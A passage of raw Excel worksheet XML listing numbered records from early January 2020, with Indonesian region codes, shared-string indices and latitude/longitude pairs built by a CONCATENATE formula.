        <f t="shared" si="3"/>
        <v>-6.16237,106.74590</v>
      </c>
    </row>
    <row r="254" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A254">
        <v>101838</v>
      </c>
      <c r="B254" s="1">
        <v>43833</v>
      </c>
      <c r="C254" s="2">
        <v>0.26422453703703702</v>
      </c>
      <c r="D254" t="s">
        <v>22</v>
      </c>
      <c r="E254" t="s">
        <v>23</v>
      </c>
      <c r="F254" t="s">
        <v>1199</v>
      </c>
      <c r="G254" t="s">
        <v>1200</v>
      </c>
      <c r="H254" t="s">
        <v>26</v>
      </c>
      <c r="I254" t="s">
        <v>1201</v>
      </c>
      <c r="J254" t="s">
        <v>37</v>
      </c>
      <c r="L254" t="s">
        <v>1202</v>
      </c>
      <c r="M254">
        <v>3276010006</v>
      </c>
      <c r="N254">
        <v>3276010</v>
      </c>
      <c r="O254">
        <v>3276</v>
      </c>
      <c r="P254">
        <v>32</v>
      </c>
      <c r="Q254" t="s">
        <v>1203</v>
      </c>
      <c r="R254" t="s">
        <v>1204</v>
      </c>
      <c r="S254" t="s">
        <v>185</v>
      </c>
      <c r="T254" t="s">
        <v>42</v>
      </c>
      <c r="U254" s="5">
        <v>10677324</v>
      </c>
      <c r="V254" s="5" t="s">
        <v>14691</v>
      </c>
      <c r="W254" s="5">
        <v>-639746</v>
      </c>
      <c r="X254" t="s">
        <v>18502</v>
      </c>
      <c r="Y254" t="str">
        <f t="shared" si="3"/>
        <v>-6.39746,106.77324</v>
      </c>
    </row>
    <row r="255" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A255">
        <v>101839</v>
      </c>
      <c r="B255" s="1">
        <v>43833</v>
      </c>
      <c r="C255" s="2">
        <v>0.3115046296296296</v>
      </c>
      <c r="D255" t="s">
        <v>22</v>
      </c>
      <c r="E255" t="s">
        <v>23</v>
      </c>
      <c r="F255" t="s">
        <v>1205</v>
      </c>
      <c r="G255" t="s">
        <v>1206</v>
      </c>
      <c r="H255" t="s">
        <v>26</v>
      </c>
      <c r="I255" t="s">
        <v>1194</v>
      </c>
      <c r="J255" t="s">
        <v>37</v>
      </c>
      <c r="L255" t="s">
        <v>1207</v>
      </c>
      <c r="M255">
        <v>3603190013</v>
      </c>
      <c r="N255">
        <v>3603190</v>
      </c>
      <c r="O255">
        <v>3603</v>
      </c>
      <c r="P255">
        <v>36</v>
      </c>
      <c r="Q255" t="s">
        <v>1208</v>
      </c>
      <c r="R255" t="s">
        <v>1209</v>
      </c>
      <c r="S255" t="s">
        <v>201</v>
      </c>
      <c r="T255" t="s">
        <v>171</v>
      </c>
      <c r="U255" s="5">
        <v>10663337</v>
      </c>
      <c r="V255" s="5" t="s">
        <v>14692</v>
      </c>
      <c r="W255" s="5">
        <v>-606818</v>
      </c>
      <c r="X255" t="s">
        <v>18503</v>
      </c>
      <c r="Y255" t="str">
        <f t="shared" si="3"/>
        <v>-6.06818,106.63337</v>
      </c>
    </row>
    <row r="256" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A256">
        <v>101840</v>
      </c>
      <c r="B256" s="1">
        <v>43833</v>
      </c>
      <c r="C256" s="2">
        <v>0.31218750000000001</v>
      </c>
      <c r="D256" t="s">
        <v>22</v>
      </c>
      <c r="E256" t="s">
        <v>23</v>
      </c>
      <c r="F256" t="s">
        <v>1210</v>
      </c>
      <c r="G256" t="s">
        <v>1211</v>
      </c>
      <c r="H256" t="s">
        <v>26</v>
      </c>
      <c r="I256" t="s">
        <v>1212</v>
      </c>
      <c r="J256" t="s">
        <v>614</v>
      </c>
      <c r="L256" t="s">
        <v>1213</v>
      </c>
      <c r="M256">
        <v>3175010002</v>
      </c>
      <c r="N256">
        <v>3175010</v>
      </c>
      <c r="O256">
        <v>3175</v>
      </c>
      <c r="P256">
        <v>31</v>
      </c>
      <c r="Q256" t="s">
        <v>616</v>
      </c>
      <c r="R256" t="s">
        <v>546</v>
      </c>
      <c r="S256" t="s">
        <v>547</v>
      </c>
      <c r="T256" t="s">
        <v>33</v>
      </c>
      <c r="U256" s="5">
        <v>10677025</v>
      </c>
      <c r="V256" s="5" t="s">
        <v>14693</v>
      </c>
      <c r="W256" s="5">
        <v>-613247</v>
      </c>
      <c r="X256" t="s">
        <v>18504</v>
      </c>
      <c r="Y256" t="str">
        <f t="shared" si="3"/>
        <v>-6.13247,106.77025</v>
      </c>
    </row>
    <row r="257" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A257">
        <v>101841</v>
      </c>
      <c r="B257" s="1">
        <v>43833</v>
      </c>
      <c r="C257" s="2">
        <v>0.30243055555555559</v>
      </c>
      <c r="D257" t="s">
        <v>85</v>
      </c>
      <c r="E257" t="s">
        <v>23</v>
      </c>
      <c r="F257" t="s">
        <v>1214</v>
      </c>
      <c r="G257" t="s">
        <v>1215</v>
      </c>
      <c r="H257" t="s">
        <v>26</v>
      </c>
      <c r="J257" t="s">
        <v>1128</v>
      </c>
      <c r="K257" t="s">
        <v>1216</v>
      </c>
      <c r="L257" t="s">
        <v>1217</v>
      </c>
      <c r="M257">
        <v>3577030008</v>
      </c>
      <c r="N257">
        <v>3577030</v>
      </c>
      <c r="O257">
        <v>3577</v>
      </c>
      <c r="P257">
        <v>35</v>
      </c>
      <c r="Q257" t="s">
        <v>1218</v>
      </c>
      <c r="R257" t="s">
        <v>1219</v>
      </c>
      <c r="S257" t="s">
        <v>1220</v>
      </c>
      <c r="T257" t="s">
        <v>1221</v>
      </c>
      <c r="U257" s="5">
        <v>11153502</v>
      </c>
      <c r="V257" s="5" t="s">
        <v>14694</v>
      </c>
      <c r="W257" s="5">
        <v>-760912</v>
      </c>
      <c r="X257" t="s">
        <v>18505</v>
      </c>
      <c r="Y257" t="str">
        <f t="shared" si="3"/>
        <v>-7.60912,111.53502</v>
      </c>
    </row>
    <row r="258" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A258">
        <v>101842</v>
      </c>
      <c r="B258" s="1">
        <v>43833</v>
      </c>
      <c r="C258" s="2">
        <v>0.36715277777777783</v>
      </c>
      <c r="D258" t="s">
        <v>22</v>
      </c>
      <c r="E258" t="s">
        <v>23</v>
      </c>
      <c r="F258" t="s">
        <v>1222</v>
      </c>
      <c r="G258" t="s">
        <v>1223</v>
      </c>
      <c r="H258" t="s">
        <v>26</v>
      </c>
      <c r="I258" t="s">
        <v>1178</v>
      </c>
      <c r="J258" t="s">
        <v>37</v>
      </c>
      <c r="L258" t="s">
        <v>1224</v>
      </c>
      <c r="M258">
        <v>3674060003</v>
      </c>
      <c r="N258">
        <v>3674060</v>
      </c>
      <c r="O258">
        <v>3674</v>
      </c>
      <c r="P258">
        <v>36</v>
      </c>
      <c r="Q258" t="s">
        <v>205</v>
      </c>
      <c r="R258" t="s">
        <v>169</v>
      </c>
      <c r="S258" t="s">
        <v>170</v>
      </c>
      <c r="T258" t="s">
        <v>171</v>
      </c>
      <c r="U258" s="5">
        <v>10670091</v>
      </c>
      <c r="V258" s="5" t="s">
        <v>14695</v>
      </c>
      <c r="W258" s="5">
        <v>-626089</v>
      </c>
      <c r="X258" t="s">
        <v>18506</v>
      </c>
      <c r="Y258" t="str">
        <f t="shared" si="3"/>
        <v>-6.26089,106.70091</v>
      </c>
    </row>
    <row r="259" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A259">
        <v>101843</v>
      </c>
      <c r="B259" s="1">
        <v>43833</v>
      </c>
      <c r="C259" s="2">
        <v>0.3836458333333333</v>
      </c>
      <c r="D259" t="s">
        <v>22</v>
      </c>
      <c r="E259" t="s">
        <v>23</v>
      </c>
      <c r="F259" t="s">
        <v>1225</v>
      </c>
      <c r="H259" t="s">
        <v>26</v>
      </c>
      <c r="I259" t="s">
        <v>1226</v>
      </c>
      <c r="J259" t="s">
        <v>793</v>
      </c>
      <c r="L259" t="s">
        <v>1227</v>
      </c>
      <c r="M259">
        <v>3175010002</v>
      </c>
      <c r="N259">
        <v>3175010</v>
      </c>
      <c r="O259">
        <v>3175</v>
      </c>
      <c r="P259">
        <v>31</v>
      </c>
      <c r="Q259" t="s">
        <v>616</v>
      </c>
      <c r="R259" t="s">
        <v>546</v>
      </c>
      <c r="S259" t="s">
        <v>547</v>
      </c>
      <c r="T259" t="s">
        <v>33</v>
      </c>
      <c r="U259" s="5">
        <v>10677519</v>
      </c>
      <c r="V259" s="5" t="s">
        <v>14696</v>
      </c>
      <c r="W259" s="5">
        <v>-613862</v>
      </c>
      <c r="X259" t="s">
        <v>18507</v>
      </c>
      <c r="Y259" t="str">
        <f t="shared" ref="Y259:Y322" si="4">CONCATENATE(X259,",",V259)</f>
        <v>-6.13862,106.77519</v>
      </c>
    </row>
    <row r="260" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A260">
        <v>101844</v>
      </c>
      <c r="B260" s="1">
        <v>43833</v>
      </c>
      <c r="C260" s="2">
        <v>0.38528935185185187</v>
      </c>
      <c r="D260" t="s">
        <v>22</v>
      </c>
      <c r="E260" t="s">
        <v>23</v>
      </c>
      <c r="F260" t="s">
        <v>1228</v>
      </c>
      <c r="H260" t="s">
        <v>26</v>
      </c>
      <c r="I260" t="s">
        <v>1181</v>
      </c>
      <c r="J260" t="s">
        <v>1229</v>
      </c>
      <c r="L260" t="s">
        <v>1230</v>
      </c>
      <c r="M260">
        <v>3175010003</v>
      </c>
      <c r="N260">
        <v>3175010</v>
      </c>
      <c r="O260">
        <v>3175</v>
      </c>
      <c r="P260">
        <v>31</v>
      </c>
      <c r="Q260" t="s">
        <v>545</v>
      </c>
      <c r="R260" t="s">
        <v>546</v>
      </c>
      <c r="S260" t="s">
        <v>547</v>
      </c>
      <c r="T260" t="s">
        <v>33</v>
      </c>
      <c r="U260" s="5">
        <v>10677754</v>
      </c>
      <c r="V260" s="5" t="s">
        <v>14697</v>
      </c>
      <c r="W260" s="5">
        <v>-613678</v>
      </c>
      <c r="X260" t="s">
        <v>18508</v>
      </c>
      <c r="Y260" t="str">
        <f t="shared" si="4"/>
        <v>-6.13678,106.77754</v>
      </c>
    </row>
    <row r="261" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A261">
        <v>101845</v>
      </c>
      <c r="B261" s="1">
        <v>43833</v>
      </c>
      <c r="C261" s="2">
        <v>0.44672453703703702</v>
      </c>
      <c r="D261" t="s">
        <v>22</v>
      </c>
      <c r="E261" t="s">
        <v>23</v>
      </c>
      <c r="F261" t="s">
        <v>1231</v>
      </c>
      <c r="G261" t="s">
        <v>1232</v>
      </c>
      <c r="H261" t="s">
        <v>26</v>
      </c>
      <c r="I261" t="s">
        <v>784</v>
      </c>
      <c r="J261" t="s">
        <v>1233</v>
      </c>
      <c r="L261" t="s">
        <v>1234</v>
      </c>
      <c r="M261">
        <v>3171060002</v>
      </c>
      <c r="N261">
        <v>3171060</v>
      </c>
      <c r="O261">
        <v>3171</v>
      </c>
      <c r="P261">
        <v>31</v>
      </c>
      <c r="Q261" t="s">
        <v>1235</v>
      </c>
      <c r="R261" t="s">
        <v>1236</v>
      </c>
      <c r="S261" t="s">
        <v>108</v>
      </c>
      <c r="T261" t="s">
        <v>33</v>
      </c>
      <c r="U261" s="5">
        <v>10680906</v>
      </c>
      <c r="V261" s="5" t="s">
        <v>14698</v>
      </c>
      <c r="W261" s="5">
        <v>-625864</v>
      </c>
      <c r="X261" t="s">
        <v>18509</v>
      </c>
      <c r="Y261" t="str">
        <f t="shared" si="4"/>
        <v>-6.25864,106.80906</v>
      </c>
    </row>
    <row r="262" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A262">
        <v>101846</v>
      </c>
      <c r="B262" s="1">
        <v>43833</v>
      </c>
      <c r="C262" s="2">
        <v>0.50840277777777776</v>
      </c>
      <c r="D262" t="s">
        <v>22</v>
      </c>
      <c r="E262" t="s">
        <v>23</v>
      </c>
      <c r="F262" t="s">
        <v>1237</v>
      </c>
      <c r="H262" t="s">
        <v>26</v>
      </c>
      <c r="I262" t="s">
        <v>1055</v>
      </c>
      <c r="J262" t="s">
        <v>619</v>
      </c>
      <c r="L262" t="s">
        <v>1238</v>
      </c>
      <c r="M262">
        <v>3174070002</v>
      </c>
      <c r="N262">
        <v>3174070</v>
      </c>
      <c r="O262">
        <v>3174</v>
      </c>
      <c r="P262">
        <v>31</v>
      </c>
      <c r="Q262" t="s">
        <v>621</v>
      </c>
      <c r="R262" t="s">
        <v>84</v>
      </c>
      <c r="S262" t="s">
        <v>32</v>
      </c>
      <c r="T262" t="s">
        <v>33</v>
      </c>
      <c r="U262" s="5">
        <v>10674247</v>
      </c>
      <c r="V262" s="5" t="s">
        <v>14699</v>
      </c>
      <c r="W262" s="5">
        <v>-616310</v>
      </c>
      <c r="X262" t="s">
        <v>18510</v>
      </c>
      <c r="Y262" t="str">
        <f t="shared" si="4"/>
        <v>-6.16310,106.74247</v>
      </c>
    </row>
    <row r="263" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A263">
        <v>101847</v>
      </c>
      <c r="B263" s="1">
        <v>43833</v>
      </c>
      <c r="C263" s="2">
        <v>0.54880787037037038</v>
      </c>
      <c r="D263" t="s">
        <v>22</v>
      </c>
      <c r="E263" t="s">
        <v>23</v>
      </c>
      <c r="F263" t="s">
        <v>1239</v>
      </c>
      <c r="H263" t="s">
        <v>26</v>
      </c>
      <c r="I263" t="s">
        <v>1240</v>
      </c>
      <c r="J263" t="s">
        <v>648</v>
      </c>
      <c r="L263" t="s">
        <v>1241</v>
      </c>
      <c r="M263">
        <v>3174020005</v>
      </c>
      <c r="N263">
        <v>3174020</v>
      </c>
      <c r="O263">
        <v>3174</v>
      </c>
      <c r="P263">
        <v>31</v>
      </c>
      <c r="Q263" t="s">
        <v>30</v>
      </c>
      <c r="R263" t="s">
        <v>31</v>
      </c>
      <c r="S263" t="s">
        <v>32</v>
      </c>
      <c r="T263" t="s">
        <v>33</v>
      </c>
      <c r="U263" s="5">
        <v>10677739</v>
      </c>
      <c r="V263" s="5" t="s">
        <v>14700</v>
      </c>
      <c r="W263" s="5">
        <v>-616946</v>
      </c>
      <c r="X263" t="s">
        <v>18511</v>
      </c>
      <c r="Y263" t="str">
        <f t="shared" si="4"/>
        <v>-6.16946,106.77739</v>
      </c>
    </row>
    <row r="264" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A264">
        <v>101848</v>
      </c>
      <c r="B264" s="1">
        <v>43833</v>
      </c>
      <c r="C264" s="2">
        <v>0.55606481481481485</v>
      </c>
      <c r="D264" t="s">
        <v>22</v>
      </c>
      <c r="E264" t="s">
        <v>23</v>
      </c>
      <c r="F264" t="s">
        <v>1242</v>
      </c>
      <c r="H264" t="s">
        <v>26</v>
      </c>
      <c r="I264" t="s">
        <v>661</v>
      </c>
      <c r="J264" t="s">
        <v>846</v>
      </c>
      <c r="L264" t="s">
        <v>1243</v>
      </c>
      <c r="M264">
        <v>3174070002</v>
      </c>
      <c r="N264">
        <v>3174070</v>
      </c>
      <c r="O264">
        <v>3174</v>
      </c>
      <c r="P264">
        <v>31</v>
      </c>
      <c r="Q264" t="s">
        <v>621</v>
      </c>
      <c r="R264" t="s">
        <v>84</v>
      </c>
      <c r="S264" t="s">
        <v>32</v>
      </c>
      <c r="T264" t="s">
        <v>33</v>
      </c>
      <c r="U264" s="5">
        <v>10674004</v>
      </c>
      <c r="V264" s="5" t="s">
        <v>14701</v>
      </c>
      <c r="W264" s="5">
        <v>-616695</v>
      </c>
      <c r="X264" t="s">
        <v>18512</v>
      </c>
      <c r="Y264" t="str">
        <f t="shared" si="4"/>
        <v>-6.16695,106.74004</v>
      </c>
    </row>
    <row r="265" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A265">
        <v>101849</v>
      </c>
      <c r="B265" s="1">
        <v>43833</v>
      </c>
      <c r="C265" s="2">
        <v>0.56295138888888896</v>
      </c>
      <c r="D265" t="s">
        <v>22</v>
      </c>
      <c r="E265" t="s">
        <v>23</v>
      </c>
      <c r="F265" t="s">
        <v>1244</v>
      </c>
      <c r="G265" t="s">
        <v>1245</v>
      </c>
      <c r="H265" t="s">
        <v>26</v>
      </c>
      <c r="I265" t="s">
        <v>555</v>
      </c>
      <c r="J265" t="s">
        <v>93</v>
      </c>
      <c r="L265" t="s">
        <v>1246</v>
      </c>
      <c r="M265">
        <v>3174020007</v>
      </c>
      <c r="N265">
        <v>3174020</v>
      </c>
      <c r="O265">
        <v>3174</v>
      </c>
      <c r="P265">
        <v>31</v>
      </c>
      <c r="Q265" t="s">
        <v>95</v>
      </c>
      <c r="R265" t="s">
        <v>31</v>
      </c>
      <c r="S265" t="s">
        <v>32</v>
      </c>
      <c r="T265" t="s">
        <v>33</v>
      </c>
      <c r="U265" s="5">
        <v>10676222</v>
      </c>
      <c r="V265" s="5" t="s">
        <v>14702</v>
      </c>
      <c r="W265" s="5">
        <v>-616044</v>
      </c>
      <c r="X265" t="s">
        <v>18513</v>
      </c>
      <c r="Y265" t="str">
        <f t="shared" si="4"/>
        <v>-6.16044,106.76222</v>
      </c>
    </row>
    <row r="266" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A266">
        <v>101850</v>
      </c>
      <c r="B266" s="1">
        <v>43833</v>
      </c>
      <c r="C266" s="2">
        <v>0.62480324074074078</v>
      </c>
      <c r="D266" t="s">
        <v>85</v>
      </c>
      <c r="E266" t="s">
        <v>23</v>
      </c>
      <c r="F266" t="s">
        <v>1247</v>
      </c>
      <c r="G266" t="s">
        <v>1248</v>
      </c>
      <c r="H266" t="s">
        <v>26</v>
      </c>
      <c r="I266" t="s">
        <v>103</v>
      </c>
      <c r="J266" t="s">
        <v>37</v>
      </c>
      <c r="K266" t="s">
        <v>1249</v>
      </c>
      <c r="L266" t="s">
        <v>1250</v>
      </c>
      <c r="M266">
        <v>3275010010</v>
      </c>
      <c r="N266">
        <v>3275010</v>
      </c>
      <c r="O266">
        <v>3275</v>
      </c>
      <c r="P266">
        <v>32</v>
      </c>
      <c r="Q266" t="s">
        <v>286</v>
      </c>
      <c r="R266" t="s">
        <v>287</v>
      </c>
      <c r="S266" t="s">
        <v>41</v>
      </c>
      <c r="T266" t="s">
        <v>42</v>
      </c>
      <c r="U266" s="5">
        <v>10694406</v>
      </c>
      <c r="V266" s="5" t="s">
        <v>14703</v>
      </c>
      <c r="W266" s="5">
        <v>-625392</v>
      </c>
      <c r="X266" t="s">
        <v>18514</v>
      </c>
      <c r="Y266" t="str">
        <f t="shared" si="4"/>
        <v>-6.25392,106.94406</v>
      </c>
    </row>
    <row r="267" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A267">
        <v>101851</v>
      </c>
      <c r="B267" s="1">
        <v>43833</v>
      </c>
      <c r="C267" s="2">
        <v>0.67228009259259258</v>
      </c>
      <c r="D267" t="s">
        <v>22</v>
      </c>
      <c r="E267" t="s">
        <v>23</v>
      </c>
      <c r="F267" t="s">
        <v>1251</v>
      </c>
      <c r="G267" t="s">
        <v>1252</v>
      </c>
      <c r="H267" t="s">
        <v>26</v>
      </c>
      <c r="I267" t="s">
        <v>1253</v>
      </c>
      <c r="J267" t="s">
        <v>37</v>
      </c>
      <c r="L267" t="s">
        <v>1254</v>
      </c>
      <c r="M267">
        <v>3216010008</v>
      </c>
      <c r="N267">
        <v>3216010</v>
      </c>
      <c r="O267">
        <v>3216</v>
      </c>
      <c r="P267">
        <v>32</v>
      </c>
      <c r="Q267" t="s">
        <v>1255</v>
      </c>
      <c r="R267" t="s">
        <v>1256</v>
      </c>
      <c r="S267" t="s">
        <v>41</v>
      </c>
      <c r="T267" t="s">
        <v>42</v>
      </c>
      <c r="U267" s="5">
        <v>10704339</v>
      </c>
      <c r="V267" s="5" t="s">
        <v>14704</v>
      </c>
      <c r="W267" s="5">
        <v>-634176</v>
      </c>
      <c r="X267" t="s">
        <v>18515</v>
      </c>
      <c r="Y267" t="str">
        <f t="shared" si="4"/>
        <v>-6.34176,107.04339</v>
      </c>
    </row>
    <row r="268" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A268">
        <v>101852</v>
      </c>
      <c r="B268" s="1">
        <v>43833</v>
      </c>
      <c r="C268" s="2">
        <v>0.68745370370370373</v>
      </c>
      <c r="D268" t="s">
        <v>22</v>
      </c>
      <c r="E268" t="s">
        <v>23</v>
      </c>
      <c r="F268" t="s">
        <v>1257</v>
      </c>
      <c r="G268" t="s">
        <v>1258</v>
      </c>
      <c r="H268" t="s">
        <v>26</v>
      </c>
      <c r="I268" t="s">
        <v>72</v>
      </c>
      <c r="J268" t="s">
        <v>1259</v>
      </c>
      <c r="M268">
        <v>3174070003</v>
      </c>
      <c r="N268">
        <v>3174070</v>
      </c>
      <c r="O268">
        <v>3174</v>
      </c>
      <c r="P268">
        <v>31</v>
      </c>
      <c r="Q268" t="s">
        <v>1260</v>
      </c>
      <c r="R268" t="s">
        <v>84</v>
      </c>
      <c r="S268" t="s">
        <v>32</v>
      </c>
      <c r="T268" t="s">
        <v>33</v>
      </c>
      <c r="U268" s="5">
        <v>10676006</v>
      </c>
      <c r="V268" s="5" t="s">
        <v>14705</v>
      </c>
      <c r="W268" s="5">
        <v>-615666</v>
      </c>
      <c r="X268" t="s">
        <v>18516</v>
      </c>
      <c r="Y268" t="str">
        <f t="shared" si="4"/>
        <v>-6.15666,106.76006</v>
      </c>
    </row>
    <row r="269" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A269">
        <v>101853</v>
      </c>
      <c r="B269" s="1">
        <v>43833</v>
      </c>
      <c r="C269" s="2">
        <v>0.95839120370370379</v>
      </c>
      <c r="D269" t="s">
        <v>22</v>
      </c>
      <c r="E269" t="s">
        <v>23</v>
      </c>
      <c r="F269" t="s">
        <v>1261</v>
      </c>
      <c r="G269" t="s">
        <v>1262</v>
      </c>
      <c r="H269" t="s">
        <v>26</v>
      </c>
      <c r="I269" t="s">
        <v>1263</v>
      </c>
      <c r="J269" t="s">
        <v>1264</v>
      </c>
      <c r="L269" t="s">
        <v>1265</v>
      </c>
      <c r="M269">
        <v>3171040001</v>
      </c>
      <c r="N269">
        <v>3171040</v>
      </c>
      <c r="O269">
        <v>3171</v>
      </c>
      <c r="P269">
        <v>31</v>
      </c>
      <c r="Q269" t="s">
        <v>162</v>
      </c>
      <c r="R269" t="s">
        <v>163</v>
      </c>
      <c r="S269" t="s">
        <v>108</v>
      </c>
      <c r="T269" t="s">
        <v>33</v>
      </c>
      <c r="U269" s="5">
        <v>10677107</v>
      </c>
      <c r="V269" s="5" t="s">
        <v>14706</v>
      </c>
      <c r="W269" s="5">
        <v>-626267</v>
      </c>
      <c r="X269" t="s">
        <v>18517</v>
      </c>
      <c r="Y269" t="str">
        <f t="shared" si="4"/>
        <v>-6.26267,106.77107</v>
      </c>
    </row>
    <row r="270" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A270">
        <v>101854</v>
      </c>
      <c r="B270" s="1">
        <v>43834</v>
      </c>
      <c r="C270" s="2">
        <v>7.7372685185185183E-2</v>
      </c>
      <c r="D270" t="s">
        <v>22</v>
      </c>
      <c r="E270" t="s">
        <v>23</v>
      </c>
      <c r="F270" t="s">
        <v>1266</v>
      </c>
      <c r="G270" t="s">
        <v>1267</v>
      </c>
      <c r="H270" t="s">
        <v>26</v>
      </c>
      <c r="I270" t="s">
        <v>722</v>
      </c>
      <c r="J270" t="s">
        <v>894</v>
      </c>
      <c r="L270" t="s">
        <v>1268</v>
      </c>
      <c r="M270">
        <v>3174020005</v>
      </c>
      <c r="N270">
        <v>3174020</v>
      </c>
      <c r="O270">
        <v>3174</v>
      </c>
      <c r="P270">
        <v>31</v>
      </c>
      <c r="Q270" t="s">
        <v>30</v>
      </c>
      <c r="R270" t="s">
        <v>31</v>
      </c>
      <c r="S270" t="s">
        <v>32</v>
      </c>
      <c r="T270" t="s">
        <v>33</v>
      </c>
      <c r="U270" s="5">
        <v>10677257</v>
      </c>
      <c r="V270" s="5" t="s">
        <v>14707</v>
      </c>
      <c r="W270" s="5">
        <v>-616584</v>
      </c>
      <c r="X270" t="s">
        <v>18400</v>
      </c>
      <c r="Y270" t="str">
        <f t="shared" si="4"/>
        <v>-6.16584,106.77257</v>
      </c>
    </row>
    <row r="271" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A271">
        <v>101855</v>
      </c>
      <c r="B271" s="1">
        <v>43834</v>
      </c>
      <c r="C271" s="2">
        <v>0.13008101851851853</v>
      </c>
      <c r="D271" t="s">
        <v>85</v>
      </c>
      <c r="E271" t="s">
        <v>23</v>
      </c>
      <c r="F271" t="s">
        <v>1269</v>
      </c>
      <c r="G271" t="s">
        <v>1270</v>
      </c>
      <c r="H271" t="s">
        <v>26</v>
      </c>
      <c r="J271" t="s">
        <v>37</v>
      </c>
      <c r="K271" t="s">
        <v>1271</v>
      </c>
      <c r="L271" t="s">
        <v>1272</v>
      </c>
      <c r="M271">
        <v>3216082002</v>
      </c>
      <c r="N271">
        <v>3216082</v>
      </c>
      <c r="O271">
        <v>3216</v>
      </c>
      <c r="P271">
        <v>32</v>
      </c>
      <c r="Q271" t="s">
        <v>1273</v>
      </c>
      <c r="R271" t="s">
        <v>601</v>
      </c>
      <c r="S271" t="s">
        <v>41</v>
      </c>
      <c r="T271" t="s">
        <v>42</v>
      </c>
      <c r="U271" s="5">
        <v>10705544</v>
      </c>
      <c r="V271" s="5" t="s">
        <v>14708</v>
      </c>
      <c r="W271" s="5">
        <v>-621280</v>
      </c>
      <c r="X271" t="s">
        <v>18518</v>
      </c>
      <c r="Y271" t="str">
        <f t="shared" si="4"/>
        <v>-6.21280,107.05544</v>
      </c>
    </row>
    <row r="272" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A272">
        <v>101856</v>
      </c>
      <c r="B272" s="1">
        <v>43834</v>
      </c>
      <c r="C272" s="2">
        <v>0.13525462962962961</v>
      </c>
      <c r="D272" t="s">
        <v>85</v>
      </c>
      <c r="E272" t="s">
        <v>23</v>
      </c>
      <c r="F272" t="s">
        <v>1274</v>
      </c>
      <c r="G272" t="s">
        <v>1275</v>
      </c>
      <c r="H272" t="s">
        <v>26</v>
      </c>
      <c r="J272" t="s">
        <v>37</v>
      </c>
      <c r="K272" t="s">
        <v>1276</v>
      </c>
      <c r="L272" t="s">
        <v>1277</v>
      </c>
      <c r="M272">
        <v>3216082002</v>
      </c>
      <c r="N272">
        <v>3216082</v>
      </c>
      <c r="O272">
        <v>3216</v>
      </c>
      <c r="P272">
        <v>32</v>
      </c>
      <c r="Q272" t="s">
        <v>1273</v>
      </c>
      <c r="R272" t="s">
        <v>601</v>
      </c>
      <c r="S272" t="s">
        <v>41</v>
      </c>
      <c r="T272" t="s">
        <v>42</v>
      </c>
      <c r="U272" s="5">
        <v>10705544</v>
      </c>
      <c r="V272" s="5" t="s">
        <v>14708</v>
      </c>
      <c r="W272" s="5">
        <v>-621280</v>
      </c>
      <c r="X272" t="s">
        <v>18518</v>
      </c>
      <c r="Y272" t="str">
        <f t="shared" si="4"/>
        <v>-6.21280,107.05544</v>
      </c>
    </row>
    <row r="273" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A273">
        <v>101857</v>
      </c>
      <c r="B273" s="1">
        <v>43834</v>
      </c>
      <c r="C273" s="2">
        <v>0.32315972222222222</v>
      </c>
      <c r="D273" t="s">
        <v>22</v>
      </c>
      <c r="E273" t="s">
        <v>23</v>
      </c>
      <c r="F273" t="s">
        <v>1278</v>
      </c>
      <c r="G273" t="s">
        <v>1279</v>
      </c>
      <c r="H273" t="s">
        <v>26</v>
      </c>
      <c r="I273" t="s">
        <v>1280</v>
      </c>
      <c r="J273" t="s">
        <v>1281</v>
      </c>
      <c r="L273" t="s">
        <v>1282</v>
      </c>
      <c r="M273">
        <v>3171040005</v>
      </c>
      <c r="N273">
        <v>3171040</v>
      </c>
      <c r="O273">
        <v>3171</v>
      </c>
      <c r="P273">
        <v>31</v>
      </c>
      <c r="Q273" t="s">
        <v>1283</v>
      </c>
      <c r="R273" t="s">
        <v>163</v>
      </c>
      <c r="S273" t="s">
        <v>108</v>
      </c>
      <c r="T273" t="s">
        <v>33</v>
      </c>
      <c r="U273" s="5">
        <v>10674776</v>
      </c>
      <c r="V273" s="5" t="s">
        <v>14709</v>
      </c>
      <c r="W273" s="5">
        <v>-623637</v>
      </c>
      <c r="X273" t="s">
        <v>18519</v>
      </c>
      <c r="Y273" t="str">
        <f t="shared" si="4"/>
        <v>-6.23637,106.74776</v>
      </c>
    </row>
    <row r="274" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A274">
        <v>101858</v>
      </c>
      <c r="B274" s="1">
        <v>43834</v>
      </c>
      <c r="C274" s="2">
        <v>0.57136574074074076</v>
      </c>
      <c r="D274" t="s">
        <v>22</v>
      </c>
      <c r="E274" t="s">
        <v>23</v>
      </c>
      <c r="F274" t="s">
        <v>1284</v>
      </c>
      <c r="H274" t="s">
        <v>26</v>
      </c>
      <c r="I274" t="s">
        <v>1285</v>
      </c>
      <c r="J274" t="s">
        <v>1286</v>
      </c>
      <c r="L274" t="s">
        <v>1287</v>
      </c>
      <c r="M274">
        <v>3171010003</v>
      </c>
      <c r="N274">
        <v>3171010</v>
      </c>
      <c r="O274">
        <v>3171</v>
      </c>
      <c r="P274">
        <v>31</v>
      </c>
      <c r="Q274" t="s">
        <v>263</v>
      </c>
      <c r="R274" t="s">
        <v>264</v>
      </c>
      <c r="S274" t="s">
        <v>108</v>
      </c>
      <c r="T274" t="s">
        <v>33</v>
      </c>
      <c r="U274" s="5">
        <v>10680708</v>
      </c>
      <c r="V274" s="5" t="s">
        <v>14710</v>
      </c>
      <c r="W274" s="5">
        <v>-632665</v>
      </c>
      <c r="X274" t="s">
        <v>18520</v>
      </c>
      <c r="Y274" t="str">
        <f t="shared" si="4"/>
        <v>-6.32665,106.80708</v>
      </c>
